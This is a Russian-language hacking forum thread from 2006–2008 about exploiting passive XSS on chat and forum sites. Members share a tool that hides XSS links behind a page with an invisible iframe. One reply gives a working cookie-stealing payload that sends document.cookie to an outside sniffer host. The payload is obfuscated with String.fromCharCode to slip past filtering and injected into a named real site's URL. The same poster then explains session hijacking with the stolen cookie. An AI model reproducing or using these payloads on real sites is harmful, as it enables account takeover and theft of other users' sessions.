Чаты Для новичков (пассивные Xss)

Discussion in 'Веб-уязвимости' started by DRON-ANARCHY, 5 Jul 2006.

  1. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    721
    Likes Received:
    142
    Reputations:
    50
    Дело было давно... я написал вот такой простенький скрипт.
    он предназначен для тех, кому в этом разделе указали на пассивные XSS.
    Если вы не знаете, что с ними делать, заходите сюда:
    http://www.dron-anarchy.jino-net.ru/xss/XSS.php

    Идея не нова(как просвятил меня NOFEAR)
    но скрипт написан уже давно, а выложен совсемнедавно(ввиду жутких проблем с нетом)
    так что пользуйте, о новички этой темы=)
     
    1 person likes this.
  2. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,610
    Likes Received:
    1,410
    Reputations:
    611
    Типа http://loc.netsec.ru/ ?

    =))
     
  3. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    721
    Likes Received:
    142
    Reputations:
    50
    типа да. Но где ты узрел 404 я не знаю...
    Плюс ко всему я понял, что люди неисправимы... я посмотрел, чем забивают скрипт..туда пишут просто названия чатов, сайтов и т.п. типа скрипт сам должен искать уязвимости...Хоть бы инструкции читали...=(
     
  4. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    758
    Likes Received:
    1,053
    Reputations:
    291
    Молоток, што скрипт закинул
    гы, но ето ЛОЛ чистой воды
    А для чего ты его используеш?
    ----------------------------------------------------------------
    Претензий не имею, все ОК!
     
    #4 Dimi4, 21 May 2007
    Last edited: 21 May 2007
  5. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    535
    Likes Received:
    66
    Reputations:
    49
    в целях проверки
     
    1 person likes this.
  6. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    721
    Likes Received:
    142
    Reputations:
    50
    лол чистой воды?))
    гыгыгыы

    Антошка2003 +1
     
  7. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    758
    Likes Received:
    1,053
    Reputations:
    291
    Ты прав, сейчас чистой воды небивает :)
     
    1 person likes this.
  8. Sol-leks

    Sol-leks New Member

    Joined:
    14 May 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Так это типа фейк? Не понимаю как работает))
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,573
    Likes Received:
    976
    Reputations:
    783
    Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.
     
    1 person likes this.
  10. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    фейк чего?
     
  11. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>
     
  12. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    721
    Likes Received:
    142
    Reputations:
    50
    О... некрофилия процветает. Опять этот топик подняли со дна)))
    по такому случаю надо пойти и залить более-менее нормальную версию на скачку

    обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы
     
    #12 DRON-ANARCHY, 14 Jul 2007
    Last edited: 14 Jul 2007
    1 person likes this.
  13. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    721
    Likes Received:
    142
    Reputations:
    50
    кстати
    Нет. Не так.
    Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так:
    скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер.
     
    1 person likes this.
  14. Worms

    Worms Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    95
    Likes Received:
    0
    Reputations:
    0
    ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать?
    http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>
     
  15. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    721
    Likes Received:
    142
    Reputations:
    50
    в куках лежит тока Id сессии...
    если скажешь, что значит
    то может и поможем)
     
  16. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Может ет и не по теме но я уже прочетал кучу статей по пасивных хсс но так и ничего у меня не вышло. Может кто даст мне ПОЛНЫЙ скрипт который нужно вставить в html код и об'яснит где окажутся куки после того так их он стырил. Плиз, помогите.....
     
  17. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    заливают шеллы и заливную рыбу))

    скрипт передачи куков на снифер вставляется в твоём случае так.

    например мой адрес снифа
    http://antichat.org/s/red.gif

    кодируем
    Code:
    <script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
    в чар код так как на том сайте экранируются кавычки и фильтруется плюсь
    и вставляем так
    Code:
    http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,111,114,103,47,115,47,114,101,100,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62))</script>
    без пробелов между цифрами
    лог снифера http://antichat.org/s/red/log.php можеш им пользоваться

    Mixon тебе тоже этот ответ адресуется так как в на примере показана хсс

    а вообще с вопросами сюда http://forum.antichat.ru/thread46016.html
     
    #17 ZET36, 16 Mar 2008
    Last edited: 16 Mar 2008
    1 person likes this.
  18. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    А как со снифера достать кук (сниф античатовский)???
     
    #18 Mixon, 18 Mar 2008
    Last edited: 18 Mar 2008
  19. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Mixon смотриш пришедшую запись (QUERY:) дальше ищещ в пришедших куках переменную с сесией и подставляеш через оперу значение этой переменной за место своей которая у тебя на нужном сайте и ты под чужим акком
     
  20. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Я вижу в лог файле вижу записи а вот пришедшых куков найти немогу.
    П.с. а нигде случайно нету именно по етому статейки? А то в статьях по хсс не пишут как их себе подставить. Там только как их стырить и что нужно для подмены опера или кукедит.
     
Loading...
Similar Threads - новичков пассивные
  1. censored!
    Replies:
    5
    Views:
    69,162